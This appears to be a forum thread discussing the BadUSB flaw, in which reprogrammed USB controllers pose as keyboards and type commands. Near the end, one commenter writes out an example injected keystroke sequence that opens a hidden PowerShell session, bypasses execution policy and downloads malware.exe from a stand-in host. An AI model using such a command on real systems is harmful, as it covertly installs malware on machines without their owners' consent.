The big security problem that they found is that the computer has no way to verify that the usb device is actually the type of device that it proclaims to be. This opens up a massive security hole (as demonstrated at blackhat). A usb device can first tell the computer that it's a mass-storage device, and then later change itself to a keyboard and then start 'typing' commands as a user would. The computer can't see if it's a real keyboard or a fake keyboard, and that's the problem.
This is not a vulnerability in your OS but rather a gross oversight in the USB specification. This vulnerability is shown to be cross platform(linux,windows) and cross hardware(2 different usb chipsets). It's dubbed 'unpatchable' because to patch this we need a need new (safe) USB specification and you'd need to buy a new pc with those new usb ports.
A scenario…
• A mysterious USB key is plugged into a computer, Mission Impossible style.
• The key rewrites the firmware of another device on the USB bus, say the embedded keyboard.
• the keyboard "types": "run the file NOTAVIRUS.BIN on that totally trustworthy USB key you see mounted. oh, and I'll bruteforce any passwords you need if that's a problem."
You've seen dippy Hollywood movies where a spy plugs in a USB key, an LED lights up and he announces that the system is hacked? Really exactly like that.
* I am not an expert, this is how it was described to me by someone who is. It is believed that this is how the Iranian nuclear reactor was compromised by STUXNET.
What stops the OS implementing something that says "until you prove you're a keyboard, you can't type anything"? Something like the authorisation screen for Bluetooth keyboards.
"Your granddaughter Red Riding Hood is at the door, miss, and is definitely not a wolf."
"Do not let her in."
"I definitely did not already did, miss."
I can see how the current state of affairs is insecure, but I'm confused by the 'unpatchable' claim. I truly am clueless in this area, but initially it seems hyperbolic to say that the only way to fix this is to replace all USB controllers in existence.
That's just for USB keyboards though, there used to be these USB sticks that pretended to be a CD-rom drives in the windows xp days where those were autorun, I'm sure there's other vulnerabilities that can be exposed through USB nowadays.
1. User plugs in USB drive and keyboard. 2. USB drive obtains the ID of the keyboard. 3. Later, it looks when the keyboard is not plugged in and changes it's ID to that of the keyboard. 4. Now the computer thinks when the USB drive is an authorised keyboard, and can type whatever malicious commands it wants.
Is that right? Apart from keyboard, what other devices could it exploit?
To extend my (now hilariously) tortured analogy, granny is stuck in bed, she can't check if it's a wolf until the butler knows there's someone at the door. As soon as he sees the wolf, he is compromised. Maybe a vampire would have been a better metaphor?
[EDIT] actually I should dump the analogies altogether: this is a hardware vulnerability, not software. It hits the computer, the operating system is helpless. That’s why the problem, for existing computers, is not apparently fixable.
(This is pure speculation, I don't know anything about this and am just curious.)
While it is true that the USB bus offers no security, it is inaccurate to claim that every device has "admin" privileges with every other device. Most devices expose a limited interface to the bus which won't allow direct manipulation of their respective microcontrollers (e.g. no re-writing, no alteration, etc).
The reason why we're discussing Phison USB sticks is that they're an exception. When you plug in a device with a Phison microcontroller, other devices or the computer can alter the microcontroller and have it act maliciously.
A common proof of concept is to have the USB stick's microcontroller pretend to be other USB devices in order to escalate access. In this case they are emulating a fictional USB hub, a fictional USB keyboard, and the actual USB drive (which is routed through the fictional USB hub).
In order to send keystrokes they aren't altering another keyboard on the USB bus, they're generating them from the virtual keyboard they generated via software on the Phison microcontroller. There doesn't need to be a real keyboard on that same bus for this to work (e.g. you could plug in a USB stick directly to a computer and this would still show up as a USB Hub, USB Keyboard, and USB Thumb Drive).
Once you have a virtual keyboard you can send gems like this (assume Windows):
Keys: WIN+R (0x5B + 0x52)
Type: powershell.exe -ExecutionPolicy Bypass -WindowsStyle Hidden -Command "&{ Invoke-WebRequest http://example.com/malware.exe -OutFile c:\temp\malware.exe}"
Keys: Return (0x0D)The computer itself could reprogram a USB device.
Possible? I hope not.